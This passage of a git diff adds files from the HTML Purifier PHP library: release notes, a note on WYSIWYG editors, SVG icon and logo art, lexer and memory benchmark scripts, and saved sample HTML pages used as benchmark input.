\ No newline at end of file diff --git a/lib/htmlpurifier/WHATSNEW b/lib/htmlpurifier/WHATSNEW new file mode 100644 index 000000000..fc4e34fc9 --- /dev/null +++ b/lib/htmlpurifier/WHATSNEW @@ -0,0 +1,8 @@ +HTML Purifier 4.4.0 is a minor security release addressing a security +vulnerability associated with some optional functionality. It also +contains an accumulation of new features and bugfixes over half a year. +New configuration options include %HTML.TargetBlank, +%HTML.AllowedComments, %HTML.AllowedCommentsRegexp, %HTML.SafeIframe, +%URI.SafeIframeRegexp, %Core.EnableIDNA (requires PEAR Net_IDNA2 module and +doesn't work for PHP 5.0.5). We also now support the 'scope' attribute on +tables. diff --git a/lib/htmlpurifier/WYSIWYG b/lib/htmlpurifier/WYSIWYG new file mode 100644 index 000000000..c518aacdd --- /dev/null +++ b/lib/htmlpurifier/WYSIWYG @@ -0,0 +1,20 @@ + +WYSIWYG - What You See Is What You Get + HTML Purifier: A Pretty Good Fit for TinyMCE and FCKeditor + +Javascript-based WYSIWYG editors, simply stated, are quite amazing. But I've +always been wary about using them due to security issues: they handle the +client-side magic, but once you've been served a piping hot load of unfiltered +HTML, what should be done then? In some situations, you can serve it uncleaned, +since you only offer these facilities to trusted(?) authors. + +Unfortunantely, for blog comments and anonymous input, BBCode, Textile and +other markup languages still reign supreme. Put simply: filtering HTML is +hard work, and these WYSIWYG authors don't offer anything to alleviate that +trouble. Therein lies the solution: + +HTML Purifier is perfect for filtering pure-HTML input from WYSIWYG editors. + +Enough said. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/art/1000passes.png b/lib/htmlpurifier/art/1000passes.png Binary files differnew file mode 100644 index 000000000..3351c92ab --- /dev/null +++ b/lib/htmlpurifier/art/1000passes.png diff --git a/lib/htmlpurifier/art/100cases.png b/lib/htmlpurifier/art/100cases.png Binary files differnew file mode 100644 index 000000000..03103a07e --- /dev/null +++ b/lib/htmlpurifier/art/100cases.png diff --git a/lib/htmlpurifier/art/favicon.ico b/lib/htmlpurifier/art/favicon.ico Binary files differnew file mode 100644 index 000000000..123fb1543 --- /dev/null +++ b/lib/htmlpurifier/art/favicon.ico diff --git a/lib/htmlpurifier/art/icon-16x16.png b/lib/htmlpurifier/art/icon-16x16.png Binary files differnew file mode 100644 index 000000000..0c4ad4ff1 --- /dev/null +++ b/lib/htmlpurifier/art/icon-16x16.png diff --git a/lib/htmlpurifier/art/icon-16x16.svg b/lib/htmlpurifier/art/icon-16x16.svg new file mode 100644 index 000000000..659c933d6 --- /dev/null +++ b/lib/htmlpurifier/art/icon-16x16.svg @@ -0,0 +1,101 @@ +<?xml version="1.0" encoding="UTF-8" standalone="no"?> +<!-- Created with Inkscape (http://www.inkscape.org/) --> +<svg + xmlns:dc="http://purl.org/dc/elements/1.1/" + xmlns:cc="http://web.resource.org/cc/" + xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" + xmlns:svg="http://www.w3.org/2000/svg" + xmlns="http://www.w3.org/2000/svg" + xmlns:sodipodi="http://inkscape.sourceforge.net/DTD/sodipodi-0.dtd" + xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" + width="16.000000px" + height="16.000000px" + id="svg2" + sodipodi:version="0.32" + inkscape:version="0.42.2" + sodipodi:docbase="C:\DOCUME~1\Edward\MYDOCU~1\MYWEBS~1\HTMLPU~1\art" + sodipodi:docname="ICON-1~1.SVG" + inkscape:export-filename="C:\Documents and Settings\Edward\My Documents\My Webs\htmlpurifier\art\icon.png" + inkscape:export-xdpi="90.000000" + inkscape:export-ydpi="90.000000"> + <defs + id="defs4"> + <linearGradient + id="linearGradient5003"> + <stop + style="stop-color:#537ddd;stop-opacity:1.0000000;" + offset="0.00000000" + id="stop5005" /> + <stop + style="stop-color:#000000;stop-opacity:1.0000000;" + offset="1.0000000" + id="stop5007" /> + </linearGradient> + <linearGradient + id="linearGradient4993"> + <stop + style="stop-color:#183577;stop-opacity:1.0000000;" + offset="0.00000000" + id="stop4995" /> + <stop + id="stop5001" + offset="0.58142859" + style="stop-color:#8b9fbb;stop-opacity:1.0000000;" /> + <stop + style="stop-color:#ffffff;stop-opacity:1.0000000;" + offset="1.0000000" + id="stop4997" /> + </linearGradient> + </defs> + <sodipodi:namedview + id="base" + pagecolor="#ffffff" + bordercolor="#666666" + borderopacity="1.0" + inkscape:pageopacity="0.0" + inkscape:pageshadow="2" + inkscape:zoom="23.255956" + inkscape:cx="3.2274095" + inkscape:cy="4.1487021" + inkscape:document-units="px" + inkscape:current-layer="layer1" + showgrid="false" + showguides="false" + gridspacingy="0.50000000cm" + gridspacingx="0.50000000cm" + gridoriginy="0.00000000cm" + gridoriginx="0.00000000cm" + gridtolerance="0.10000000cm" + gridempspacing="2" + inkscape:grid-points="true" + inkscape:grid-bbox="false" + inkscape:window-width="975" + inkscape:window-height="759" + inkscape:window-x="130" + inkscape:window-y="129" /> + <metadata + id="metadata7"> + <rdf:RDF> + <cc:Work + rdf:about=""> + <dc:format>image/svg+xml</dc:format> + <dc:type + rdf:resource="http://purl.org/dc/dcmitype/StillImage" /> + </cc:Work> + </rdf:RDF> + </metadata> + <g + inkscape:label="Layer 1" + inkscape:groupmode="layer" + id="layer1"> + <path + style="fill:none;fill-opacity:0.75000000;fill-rule:evenodd;stroke:#000000;stroke-width:1.0000004px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1.0000000" + d="M 6.1949060,157.57756 L 6.1949060,157.57756 z " + id="path1319" /> + <path + style="fill:#224db0;fill-opacity:1.0000000;fill-rule:evenodd;stroke:none;stroke-width:6.0000000;stroke-linecap:butt;stroke-linejoin:round;marker-start:none;stroke-miterlimit:4.0000000;stroke-dasharray:none;stroke-opacity:1.0000000" + d="M 0.58257145,1.2121863 C 0.63548185,3.4711463 0.61139575,5.1777365 1.0905516,7.3958765 C 1.2484712,8.3223265 2.8202544,8.4670465 3.5807376,8.5653065 C 4.0690207,8.6283965 4.0902492,8.5661465 4.0906878,9.1995265 C 4.1064337,11.195036 4.0317991,11.792303 4.0906878,13.786273 C 4.0906878,15.786203 4.0909380,15.786453 6.0908601,15.786453 C 9.0907431,15.786453 10.414747,15.786053 12.414669,15.786053 C 14.414592,15.786053 14.414842,15.785813 14.414842,13.785893 C 14.418166,10.552283 14.404522,7.8374163 14.421897,4.6040763 C 14.625008,2.9294663 14.978320,2.5231063 15.830433,1.1499263 C 15.040843,1.1499263 14.943078,1.1493063 14.129102,1.1493063 C 8.8912931,1.1493063 5.8203807,1.2121863 0.58257145,1.2121863 z M 2.0905126,2.4028663 C 2.8330809,2.4028663 3.3476197,2.4028663 4.0901879,2.4028663 C 4.0901879,4.8586963 4.0906878,4.8408265 4.0906878,7.2966665 C 3.2248799,7.2967665 2.2374444,7.5239665 2.1488437,6.3255665 C 1.8765344,4.2270765 1.8837837,4.4962263 2.0905126,2.4028663 z M 5.4346466,6.5656265 L 6.8695071,6.5656265 L 6.8696331,13.558223 L 9.8657791,11.557663 L 9.8656551,6.5656265 L 13.070633,6.5656265 L 13.070633,13.786523 C 13.070633,14.786503 13.070633,14.786503 12.070671,14.786503 L 6.4158330,14.786503 C 5.5388453,14.786503 5.4347719,14.786723 5.4347719,13.786523 L 5.4346466,6.5656265 z " + id="path1325" + sodipodi:nodetypes="ccsccsscccsccccccccccccccccc" /> + </g> +</svg> diff --git a/lib/htmlpurifier/art/icon-32x32.png b/lib/htmlpurifier/art/icon-32x32.png Binary files differnew file mode 100644 index 000000000..23a498ccb --- /dev/null +++ b/lib/htmlpurifier/art/icon-32x32.png diff --git a/lib/htmlpurifier/art/icon-32x32.svg b/lib/htmlpurifier/art/icon-32x32.svg new file mode 100644 index 000000000..a60927ec9 --- /dev/null +++ b/lib/htmlpurifier/art/icon-32x32.svg @@ -0,0 +1,101 @@ +<?xml version="1.0" encoding="UTF-8" standalone="no"?> +<!-- Created with Inkscape (http://www.inkscape.org/) --> +<svg + xmlns:dc="http://purl.org/dc/elements/1.1/" + xmlns:cc="http://web.resource.org/cc/" + xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" + xmlns:svg="http://www.w3.org/2000/svg" + xmlns="http://www.w3.org/2000/svg" + xmlns:sodipodi="http://inkscape.sourceforge.net/DTD/sodipodi-0.dtd" + xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" + width="16.000000px" + height="16.000000px" + id="svg2" + sodipodi:version="0.32" + inkscape:version="0.42.2" + sodipodi:docbase="C:\DOCUME~1\Edward\MYDOCU~1\MYWEBS~1\HTMLPU~1\art" + sodipodi:docname="icon-32x32.svg" + inkscape:export-filename="C:\Documents and Settings\Edward\My Documents\My Webs\htmlpurifier\art\icon-16x16.png" + inkscape:export-xdpi="90.000000" + inkscape:export-ydpi="90.000000"> + <defs + id="defs4"> + <linearGradient + id="linearGradient5003"> + <stop + style="stop-color:#537ddd;stop-opacity:1.0000000;" + offset="0.00000000" + id="stop5005" /> + <stop + style="stop-color:#000000;stop-opacity:1.0000000;" + offset="1.0000000" + id="stop5007" /> + </linearGradient> + <linearGradient + id="linearGradient4993"> + <stop + style="stop-color:#183577;stop-opacity:1.0000000;" + offset="0.00000000" + id="stop4995" /> + <stop + id="stop5001" + offset="0.58142859" + style="stop-color:#8b9fbb;stop-opacity:1.0000000;" /> + <stop + style="stop-color:#ffffff;stop-opacity:1.0000000;" + offset="1.0000000" + id="stop4997" /> + </linearGradient> + </defs> + <sodipodi:namedview + id="base" + pagecolor="#ffffff" + bordercolor="#666666" + borderopacity="1.0" + inkscape:pageopacity="0.0" + inkscape:pageshadow="2" + inkscape:zoom="23.255956" + inkscape:cx="3.2274095" + inkscape:cy="4.1487021" + inkscape:document-units="px" + inkscape:current-layer="layer1" + showgrid="false" + showguides="false" + gridspacingy="0.50000000cm" + gridspacingx="0.50000000cm" + gridoriginy="0.00000000cm" + gridoriginx="0.00000000cm" + gridtolerance="0.10000000cm" + gridempspacing="2" + inkscape:grid-points="true" + inkscape:grid-bbox="false" + inkscape:window-width="975" + inkscape:window-height="759" + inkscape:window-x="130" + inkscape:window-y="129" /> + <metadata + id="metadata7"> + <rdf:RDF> + <cc:Work + rdf:about=""> + <dc:format>image/svg+xml</dc:format> + <dc:type + rdf:resource="http://purl.org/dc/dcmitype/StillImage" /> + </cc:Work> + </rdf:RDF> + </metadata> + <g + inkscape:label="Layer 1" + inkscape:groupmode="layer" + id="layer1"> + <path + style="fill:none;fill-opacity:0.75000000;fill-rule:evenodd;stroke:#000000;stroke-width:1.0000004px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1.0000000" + d="M 6.1949060,157.57756 L 6.1949060,157.57756 z " + id="path1319" /> + <path + style="fill:#224db0;fill-opacity:1.0000000;fill-rule:evenodd;stroke:none;stroke-width:6.0000000;stroke-linecap:butt;stroke-linejoin:round;marker-start:none;stroke-miterlimit:4.0000000;stroke-dasharray:none;stroke-opacity:1.0000000" + d="M 0.58257145,1.2121863 C 0.63548185,3.4711463 0.61139575,5.1777365 1.0905516,7.3958765 C 1.2484712,8.3223265 2.8202544,8.4670465 3.5807376,8.5653065 C 4.0690207,8.6283965 4.0902492,8.5661465 4.0906878,9.1995265 C 4.1064337,11.195036 4.0317991,11.792303 4.0906878,13.786273 C 4.0906878,15.786203 4.0909380,15.786453 6.0908601,15.786453 C 9.0907431,15.786453 10.414747,15.786053 12.414669,15.786053 C 14.414592,15.786053 14.414842,15.785813 14.414842,13.785893 C 14.418166,10.552283 14.404522,7.8374163 14.421897,4.6040763 C 14.625008,2.9294663 14.978320,2.5231063 15.830433,1.1499263 C 15.040843,1.1499263 14.943078,1.1493063 14.129102,1.1493063 C 8.8912931,1.1493063 5.8203807,1.2121863 0.58257145,1.2121863 z M 2.0905126,2.4028663 C 2.8330809,2.4028663 3.3476197,2.4028663 4.0901879,2.4028663 C 4.0901879,4.8586963 4.0906878,4.8408265 4.0906878,7.2966665 C 3.2248799,7.2967665 2.2374444,7.5239665 2.1488437,6.3255665 C 1.8765344,4.2270765 1.8837837,4.4962263 2.0905126,2.4028663 z M 5.0906487,6.5656265 L 6.8695071,6.5656265 L 6.8696331,13.558223 L 9.8657791,11.557663 L 9.8656551,6.5656265 L 13.414631,6.5656265 L 13.414631,13.786523 C 13.414631,14.786503 13.414631,14.786503 12.414669,14.786503 L 6.0718351,14.786503 C 5.1948474,14.786503 5.0907740,14.786723 5.0907740,13.786523 L 5.0906487,6.5656265 z " + id="path1325" + sodipodi:nodetypes="ccsccsscccsccccccccccccccccc" /> + </g> +</svg> diff --git a/lib/htmlpurifier/art/icon-64x64.png b/lib/htmlpurifier/art/icon-64x64.png Binary files differnew file mode 100644 index 000000000..0a65932dc --- /dev/null +++ b/lib/htmlpurifier/art/icon-64x64.png diff --git a/lib/htmlpurifier/art/logo-large.png b/lib/htmlpurifier/art/logo-large.png Binary files differnew file mode 100644 index 000000000..f285fd1c3 --- /dev/null +++ b/lib/htmlpurifier/art/logo-large.png diff --git a/lib/htmlpurifier/art/logo.png b/lib/htmlpurifier/art/logo.png Binary files differnew file mode 100644 index 000000000..a037ec04b --- /dev/null +++ b/lib/htmlpurifier/art/logo.png diff --git a/lib/htmlpurifier/art/logo.svg b/lib/htmlpurifier/art/logo.svg new file mode 100644 index 000000000..26331f32c --- /dev/null +++ b/lib/htmlpurifier/art/logo.svg @@ -0,0 +1,119 @@ +<?xml version="1.0" encoding="UTF-8" standalone="no"?> +<!-- Created with Inkscape (http://www.inkscape.org/) --> +<svg + xmlns:dc="http://purl.org/dc/elements/1.1/" + xmlns:cc="http://web.resource.org/cc/" + xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" + xmlns:svg="http://www.w3.org/2000/svg" + xmlns="http://www.w3.org/2000/svg" + xmlns:xlink="http://www.w3.org/1999/xlink" + xmlns:sodipodi="http://inkscape.sourceforge.net/DTD/sodipodi-0.dtd" + xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" + width="82.000000mm" + height="82.000000mm" + id="svg2" + sodipodi:version="0.32" + inkscape:version="0.42.2" + sodipodi:docbase="C:\Documents and Settings\Edward\My Documents\My Webs\htmlpurifier\art" + sodipodi:docname="logo-bold-large.svg"> + <defs + id="defs4"> + <linearGradient + id="linearGradient5003"> + <stop + style="stop-color:#537ddd;stop-opacity:1.0000000;" + offset="0.00000000" + id="stop5005" /> + <stop + style="stop-color:#000000;stop-opacity:1.0000000;" + offset="1.0000000" + id="stop5007" /> + </linearGradient> + <linearGradient + id="linearGradient4993"> + <stop + style="stop-color:#183577;stop-opacity:1.0000000;" + offset="0.00000000" + id="stop4995" /> + <stop + id="stop5001" + offset="0.58142859" + style="stop-color:#8b9fbb;stop-opacity:1.0000000;" /> + <stop + style="stop-color:#ffffff;stop-opacity:1.0000000;" + offset="1.0000000" + id="stop4997" /> + </linearGradient> + <linearGradient + inkscape:collect="always" + xlink:href="#linearGradient4993" + id="linearGradient4999" + x1="283.46457" + y1="141.72675" + x2="11.135608" + y2="141.72675" + gradientUnits="userSpaceOnUse" + gradientTransform="translate(2.000000,4.000000)" /> + <linearGradient + inkscape:collect="always" + xlink:href="#linearGradient5003" + id="linearGradient5009" + x1="2.9621078" + y1="141.72675" + x2="283.46457" + y2="141.72675" + gradientUnits="userSpaceOnUse" + gradientTransform="translate(2.000000,4.000000)" /> + </defs> + <sodipodi:namedview + id="base" + pagecolor="#ffffff" + bordercolor="#666666" + borderopacity="1.0" + inkscape:pageopacity="0.0" + inkscape:pageshadow="2" + inkscape:zoom="1.0000000" + inkscape:cx="100.23897" + inkscape:cy="178.03397" + inkscape:document-units="px" + inkscape:current-layer="layer1" + showgrid="false" + showguides="false" + gridspacingy="0.50000000cm" + gridspacingx="0.50000000cm" + gridoriginy="0.00000000cm" + gridoriginx="0.00000000cm" + gridtolerance="0.10000000cm" + gridempspacing="2" + inkscape:grid-points="true" + inkscape:grid-bbox="false" + inkscape:window-width="975" + inkscape:window-height="759" + inkscape:window-x="139" + inkscape:window-y="88" /> + <metadata + id="metadata7"> + <rdf:RDF> + <cc:Work + rdf:about=""> + <dc:format>image/svg+xml</dc:format> + <dc:type + rdf:resource="http://purl.org/dc/dcmitype/StillImage" /> + </cc:Work> + </rdf:RDF> + </metadata> + <g + inkscape:label="Layer 1" + inkscape:groupmode="layer" + id="layer1"> + <path + style="fill:none;fill-opacity:0.75000000;fill-rule:evenodd;stroke:#000000;stroke-width:1.0000000px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1.0000000" + d="M 19.726130,9.6194746 L 19.726130,9.6194746 z " + id="path1319" /> + <path + style="fill:url(#linearGradient4999);fill-opacity:1.0000000;fill-rule:evenodd;stroke:url(#linearGradient5009);stroke-width:10.000000;stroke-linecap:butt;stroke-linejoin:round;marker-start:none;stroke-miterlimit:4.0000000;stroke-dasharray:none;stroke-opacity:1.0000000" + d="M 4.9621078,5.1031050 C 5.8995325,45.125639 5.4727947,85.709799 13.962107,125.00936 C 16.760003,141.42321 35.988453,143.98728 49.462107,145.72811 C 58.113128,146.84585 67.112800,145.74318 67.120572,156.96457 C 67.399545,192.31975 66.077225,216.69948 67.120572,252.02707 C 67.120572,287.46015 67.125004,287.46457 102.55807,287.46457 C 155.70768,287.46457 179.16536,287.45768 214.59843,287.45768 C 250.03151,287.45768 250.03593,287.45325 250.03593,252.02018 C 250.09483,194.72943 249.85310,122.48395 250.16093,65.197704 C 253.75952,35.528496 270.36749,28.328596 285.46457,4.0000020 C 271.47521,4.0000020 259.39483,3.9889299 244.97343,3.9889297 C 152.17399,3.9889293 97.761552,5.1031060 4.9621078,5.1031050 z M 31.678643,26.198667 C 44.834892,26.198667 53.955464,26.198667 67.111714,26.198667 C 67.111713,69.709084 67.120572,79.741005 67.120572,123.25143 C 51.780853,123.25317 34.281868,127.27859 32.712107,106.04622 C 27.887543,68.866763 28.015982,63.286945 31.678643,26.198667 z M 84.837103,110.29921 L 102.55585,110.29921 L 102.55807,247.98656 L 155.64148,212.54217 L 155.63926,110.29921 L 232.31496,110.29921 L 232.31496,252.03150 C 232.31496,269.74803 232.31496,269.74803 214.59843,269.74803 L 102.22100,269.74803 C 86.683215,269.74803 84.839322,269.75212 84.839322,252.03150 L 84.837103,110.29921 z " + id="path1325" + sodipodi:nodetypes="ccsccsscccsccccccccccccccccc" /> + </g> +</svg> diff --git a/lib/htmlpurifier/art/powered.png b/lib/htmlpurifier/art/powered.png Binary files differnew file mode 100644 index 000000000..119c4b9c7 --- /dev/null +++ b/lib/htmlpurifier/art/powered.png diff --git a/lib/htmlpurifier/benchmarks/.htaccess b/lib/htmlpurifier/benchmarks/.htaccess new file mode 100644 index 000000000..3a4288278 --- /dev/null +++ b/lib/htmlpurifier/benchmarks/.htaccess @@ -0,0 +1 @@ +Deny from all diff --git a/lib/htmlpurifier/benchmarks/ConfigSchema.php b/lib/htmlpurifier/benchmarks/ConfigSchema.php new file mode 100644 index 000000000..087758c37 --- /dev/null +++ b/lib/htmlpurifier/benchmarks/ConfigSchema.php @@ -0,0 +1,16 @@ +<?php + +chdir(dirname(__FILE__)); + +//require_once '../library/HTMLPurifier.path.php'; +shell_exec('php ../maintenance/generate-schema-cache.php'); +require_once '../library/HTMLPurifier.path.php'; +require_once 'HTMLPurifier.includes.php'; + +$begin = xdebug_memory_usage(); + +$schema = HTMLPurifier_ConfigSchema::makeFromSerial(); + +echo xdebug_memory_usage() - $begin; + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/benchmarks/Lexer.php b/lib/htmlpurifier/benchmarks/Lexer.php new file mode 100644 index 000000000..686ef63e6 --- /dev/null +++ b/lib/htmlpurifier/benchmarks/Lexer.php @@ -0,0 +1,158 @@ +<?php + +require_once '../library/HTMLPurifier.auto.php'; +@include_once '../test-settings.php'; + +// PEAR +require_once 'Benchmark/Timer.php'; // to do the timing +require_once 'Text/Password.php'; // for generating random input + +$LEXERS = array(); +$RUNS = isset($GLOBALS['HTMLPurifierTest']['Runs']) + ? $GLOBALS['HTMLPurifierTest']['Runs'] : 2; + +require_once 'HTMLPurifier/Lexer/DirectLex.php'; +$LEXERS['DirectLex'] = new HTMLPurifier_Lexer_DirectLex(); + +if (version_compare(PHP_VERSION, '5', '>=')) { + require_once 'HTMLPurifier/Lexer/DOMLex.php'; + $LEXERS['DOMLex'] = new HTMLPurifier_Lexer_DOMLex(); +} + +// custom class to aid unit testing +class RowTimer extends Benchmark_Timer +{ + + var $name; + + function RowTimer($name, $auto = false) { + $this->name = htmlentities($name); + $this->Benchmark_Timer($auto); + } + + function getOutput() { + + $total = $this->TimeElapsed(); + $result = $this->getProfiling(); + $dashes = ''; + + $out = '<tr>'; + + $out .= "<td>{$this->name}</td>"; + + $standard = false; + + foreach ($result as $k => $v) { + if ($v['name'] == 'Start' || $v['name'] == 'Stop') continue; + + //$perc = (($v['diff'] * 100) / $total); + //$tperc = (($v['total'] * 100) / $total); + + //$out .= '<td align="right">' . $v['diff'] . '</td>'; + + if ($standard == false) $standard = $v['diff']; + + $perc = $v['diff'] * 100 / $standard; + $bad_run = ($v['diff'] < 0); + + $out .= '<td align="right"'. + ($bad_run ? ' style="color:#AAA;"' : ''). + '>' . number_format($perc, 2, '.', '') . + '%</td><td>'.number_format($v['diff'],4,'.','').'</td>'; + + } + + $out .= '</tr>'; + + return $out; + } +} + +function print_lexers() { + global $LEXERS; + $first = true; + foreach ($LEXERS as $key => $value) { + if (!$first) echo ' / '; + echo htmlspecialchars($key); + $first = false; + } +} + +function do_benchmark($name, $document) { + global $LEXERS, $RUNS; + + $config = HTMLPurifier_Config::createDefault(); + $context = new HTMLPurifier_Context(); + + $timer = new RowTimer($name); + $timer->start(); + + foreach($LEXERS as $key => $lexer) { + for ($i=0; $i<$RUNS; $i++) $tokens = $lexer->tokenizeHTML($document, $config, $context); + $timer->setMarker($key); + } + + $timer->stop(); + $timer->display(); +} + +?> +<html> +<head> +<title>Benchmark: <?php print_lexers(); ?></title> +</head> +<body> +<h1>Benchmark: <?php print_lexers(); ?></h1> +<table border="1"> +<tr><th>Case</th><?php +foreach ($LEXERS as $key => $value) { + echo '<th colspan="2">' . htmlspecialchars($key) . '</th>'; +} +?></tr> +<?php + +// ************************************************************************** // + +// sample of html pages + +$dir = 'samples/Lexer'; +$dh = opendir($dir); +while (false !== ($filename = readdir($dh))) { + + if (strpos($filename, '.html') !== strlen($filename) - 5) continue; + $document = file_get_contents($dir . '/' . $filename); + do_benchmark("File: $filename", $document); + +} + +// crashers, caused infinite loops before + +$snippets = array(); +$snippets[] = '<a href="foo>'; +$snippets[] = '<a "=>'; + +foreach ($snippets as $snippet) { + do_benchmark($snippet, $snippet); +} + +// random input + +$random = Text_Password::create(80, 'unpronounceable', 'qwerty <>="\''); + +do_benchmark('Random input', $random); + +?></table> + +<?php + +echo '<div>Random input was: ' . + '<span colspan="4" style="font-family:monospace;">' . + htmlspecialchars($random) . '</span></div>'; + +?> + + +</body></html> +<?php + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/benchmarks/Trace.php b/lib/htmlpurifier/benchmarks/Trace.php new file mode 100644 index 000000000..07a662848 --- /dev/null +++ b/lib/htmlpurifier/benchmarks/Trace.php @@ -0,0 +1,21 @@ +<?php + +ini_set('xdebug.trace_format', 1); +ini_set('xdebug.show_mem_delta', true); + +if (file_exists('Trace.xt')) { + echo "Previous trace Trace.xt must be removed before this script can be run."; + exit; +} + +xdebug_start_trace(dirname(__FILE__) . '/Trace'); +require_once '../library/HTMLPurifier.auto.php'; + +$purifier = new HTMLPurifier(); + +$data = $purifier->purify(file_get_contents('samples/Lexer/4.html')); +xdebug_stop_trace(); + +echo "Trace finished."; + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/benchmarks/samples/Lexer/1.html b/lib/htmlpurifier/benchmarks/samples/Lexer/1.html new file mode 100644 index 000000000..45cf907bc --- /dev/null +++ b/lib/htmlpurifier/benchmarks/samples/Lexer/1.html @@ -0,0 +1,56 @@ +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<html> +<head> + <title>Main Page - Huaxia Taiji Club</title> + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> + <link rel="stylesheet" type="text/css" media="screen, projection" href="/screen.css" /> + <link rel="stylesheet" type="text/css" media="print" href="/print.css" /> +</head> +<body> + +<div id="translation"><a href="/ch/Main_Page">中文</a></div> + +<div id="heading"><a href="/en/Main_Page" title="English Main Page">Huaxia Taiji Club</a> + <a class="heading_ch" href="/ch/Main_Page" title="中文主页">华夏太极俱乐部</a></div> +<ul id="menu"> + <li><a href="/en/Main_Page" class="active">Main Page</a></li><li><a href="/en/About">About</a></li><li><a href="/en/News">News</a></li><li><a href="/en/Events">Events</a></li><li><a href="/en/Digest">Digest</a></li><li><a href="/en/Taiji_and_I">Taiji and I</a></li><li><a href="/en/Downloads">Downloads</a></li><li><a href="/en/Registration">Registration</a></li><li><a href="/en/Contact">Contact</a></li> <li><a href="http://www.taijiclub.org/gallery2/main.php">Gallery</a></li> + + <li><a href="http://www.taijiclub.org/forums/index.php">Forums</a></li> + +</ul> +<div id="content"> +<h1 id="title">Main Page</h1><h2>Taiji (Tai Chi) </h2> + +<div id="sidebar"> +<h3>Recent News</h3> +<ul> + <li>Zou Xiaojun was elected as the new club vice president </li> + + <li>HX Edison Taiji Club <a href="http://www.taijiclub.org/downloads/Taiji_club_regulation_.pdf">by-law</a> effective 3/28/2006</li> + <li>A new email account for our club: HXEdisontaijiclub@yahoo.com</li> + + <li>Workshop conducted by <a href="http://www.taijiclub.org/ch/Digest/LiDeyin">?????</a> Li Deyin is set on June 4, 2006 at Clarion Hotel in Edison from 9:30am-12pm; <a href="http://www.taijiclub.org/en/Registration">Registration</a></li> + +</ul> +</div> + + + +<p><i>Taiji</i> is an ancient Chinese tradition of movement systems that is associated with philosophy, physiology, psychology, geometry and dynamics. It is the slowest form of martial arts and is meant to improve the internal spirit. It is soothing to the soul and extremely invigorating. </p> + +<p>The founder of Taiji was Zhang Sanfeng (Chang San-feng), who was a monk of the Wu Dang (Wu Tang) Monastery and lived in the period from 1391 to 1459. His exercises stressed suppleness and elasticity as opposed to the hardness and force of other martial art styles. Several centuries old, Taiji was originally developed as a form of self-defense, emphasizing strength, balance, flexibility and speed. Tai Chi also differs from other martial arts in that it is based on the Taoist religion and aims to avoid aggressive forces. </p> + +<p>Modern Taiji includes many forms — Quan, Sword and Fan. Impacting the mind and body of the practitioners, Taiji is practiced as a meditative exercise made up of a series of forms, or choreographed motions, requiring slow, gentle movement of the arms, legs and torso. Taiji practitioners learn to center their attention on their breathing and body movements so that the exercise strengthens their overall mental and physical awareness. In a sense, Taiji is similar to yoga in that it is also a form of moving meditation, with the goal of achieving stillness through the motion and awareness of breath. To perform Taiji, practitioners have to empty their mind of thoughts and worries in order to achieve harmony. It is a great aid for reducing stress and improving the quality of life. </p> + +<p>In China and in communities all over the world, Taiji is practiced by young and old in the early morning hours. It's a great way to bring a new and fresh day!</p> + +<p>Check out our <a href="/gallery2/main.php">gallery</a>.</p> + +<div style="text-align:center;"><a href="http://www.taijiclub.org/gallery2/v/2006/group1b.jpg.html?g2_imageViewsIndex=1"><img src="/gallery2/d/1836-2/group1b.jpg" /></a></div> + +<div style="text-align:center;">Click on photo to see HR version</div></div> +</body> +</html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/benchmarks/samples/Lexer/2.html b/lib/htmlpurifier/benchmarks/samples/Lexer/2.html new file mode 100644 index 000000000..a56445763 --- /dev/null +++ b/lib/htmlpurifier/benchmarks/samples/Lexer/2.html @@ -0,0 +1,20 @@ +<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google</title><style><!-- +body,td,a,p,.h{font-family:arial,sans-serif;} +.h{font-size: 20px;} +.q{color:#0000cc;} +//--> +</style> +<script> +<!-- +function sf(){document.f.q.focus();} +function rwt(el,ct,cd,sg){var e = window.encodeURIComponent ? encodeURIComponent : escape;el.href="/url?sa=t&ct="+e(ct)+"&cd="+e(cd)+"&url="+e(el.href).replace(/\+/g,"%2B")+"&ei=fHNBRJDEG4HSaLONmIoP"+sg;el.onmousedown="";return true;} +// --> +</script> +</head><body bgcolor=#ffffff text=#000000 link=#0000cc vlink=#551a8b alink=#ff0000 onLoad=sf() topmargin=3 marginheight=3><center><table border=0 cellspacing=0 cellpadding=0 width=100%><tr><td align=right nowrap><font size=-1><b>edwardzyang@gmail.com</b> | <a href="/url?sa=p&pref=ig&pval=2&q=http://www.google.com/ig%3Fhl%3Den" onmousedown="return rwt(this,'pro','hppphou:def','&sig2=hDbTpsWIp9YG37a23n6krQ')">Personalized Home</a> | <a href="/searchhistory/?hl=en">Search History</a> | <a href="https://www.google.com/accounts/ManageAccount">My Account</a> | <a href="http://www.google.com/accounts/Logout?continue=http://www.google.com/">Sign out</a></font></td></tr><tr height=4><td><img alt="" width=1 height=1></td></tr></table><img src="/intl/en/images/logo.gif" width=276 height=110 alt="Google"><br><br> +<form action=/search name=f><script><!-- +function qs(el) {if (window.RegExp && window.encodeURIComponent) {var ue=el.href;var qe=encodeURIComponent(document.f.q.value);if(ue.indexOf("q=")!=-1){el.href=ue.replace(new RegExp("q=[^&$]*"),"q="+qe);}else{el.href=ue+"&q="+qe;}}return 1;} +// --> +</script><table border=0 cellspacing=0 cellpadding=4><tr><td nowrap><font size=-1><b>Web</b> <a id=1a class=q href="/imghp?hl=en&tab=wi" onClick="return qs(this);">Images</a> <a id=2a class=q href="http://groups.google.com/grphp?hl=en&tab=wg" onClick="return qs(this);">Groups</a> <a id=4a class=q href="http://news.google.com/nwshp?hl=en&tab=wn" 